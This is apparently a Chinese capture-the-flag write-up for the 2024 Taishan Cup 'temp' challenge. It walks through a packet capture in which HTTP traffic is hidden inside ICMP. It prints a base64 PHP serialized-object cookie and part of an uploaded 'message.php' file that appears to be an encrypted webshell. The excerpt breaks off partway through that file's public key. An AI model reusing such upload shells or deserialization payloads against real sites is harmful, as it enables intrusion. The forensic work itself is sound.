tacooo

tacooo

关注
发信
关注(28)粉丝(399)

20240911泰山杯初赛--temp

Wireshark打开temp.pcap流量包,发现有很多ICMP协议包。
20240911泰山杯初赛--temp-LMLPHP

一些ICMP数据包较大,且可发现,明显在传输HTTP协议数据内容:

20240911泰山杯初赛--temp-LMLPHP

右键,【显示分组字节】,进一步分析这些HTTP数据:

GET /test.html HTTP/1.1 
Host: 192.168.11.1 
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 
Accept-Language: en-US,en;q=0.5 
Accept-Encoding: gzip, deflate 
Connection: keep-alive 
Cookie: PHPSESSID=Tzo5OiJQYWdlTW9kZWwiOjE6e3M6NDoiZmlsZSI7czoxNToiL3d3dy9pbmRleC5odG1sIjt9 
Upgrade-Insecure-Requests: 1 
If-Modified-Since: Tue, 19 Oct 2021 02:52:56 GMT 
If-None-Match: "110-5ceabc236d07e-gzip"

其中, 【Tzo5OiJQYWdlTW9kZWwiOjE6e3M6NDoiZmlsZSI7czoxNToiL3d3dy9pbmRleC5odG1sIjt9】是一个路径: O:9:“PageModel”:1:{s:4:“file”;s:15:“/www/index.html”;} 。

继续看其他ICMP包(43676、43680),发现以下HTTP数据比较可疑:

POST /upload.php HTTP/1.1 
Host: 192.168.11.1 
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 
Accept-Language: en-US,en;q=0.5 
Accept-Encoding: gzip, deflate 
Content-Type: multipart/form-data; boundary=---------------------------202049257429575872453803494412 
Content-Length: 1812 
Origin: http://192.168.11.1 
Connection: keep-alive 
Referer: http://192.168.11.1/test.html 
Cookie: PHPSESSID=Tzo5OiJQYWdlTW9kZWwiOjE6e3M6NDoiZmlsZSI7czoxNToiL3d3dy9pbmRleC5odG1sIjt9 
Upgrade-Insecure-Requests: 1 
 
-----------------------------202049257429575872453803494412 
Content-Disposition: form-data; name="fileToUpload"; filename="message.php" 
Content-Type: application/x-php 
 
<?php
define('AES_256_ECB', 'aes-256-ecb');

if(!isset($_REQUEST['pub']))
    die("403 Forbiden");

if(!isset($_REQUEST['maybe_key']))
    die("403 Forbiden");

$publicKeyString = <<<PK
-----BEGIN PUBLIC KEY-----
MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6YEBA42r+mPDGi1JTSK9
3yszPBPEzj4D+hlamCt/RCelQgnOptkfpziGZ6J466N7/Y9N4iuNI6oPiohZXFmM
H4CAfdqRI0B7kIlB6UFBoZPTxUgIQof1aaNcu7u0a6Rd2YGtREEAWqQri2mpGikq
g8B3k75fFOGaxfV3HL07lwko15mbgyZdtGZwof3Bepp8DdkfmSEp3wygMy1Tygk7
sI4g1AA/7l+2VIEw/zrwSo5maG98CcKoTmMygBUeVOCB+YkGti4UBYUOcOCkWrBR
YSsCZNiSGuSwMkSw80RWPmMeTV7Zqzln6ho9LFkCnXyQ77yTNJJpA6J
09-15 08:55
Powered by LMLPHP ©2024 tacooo 0.001430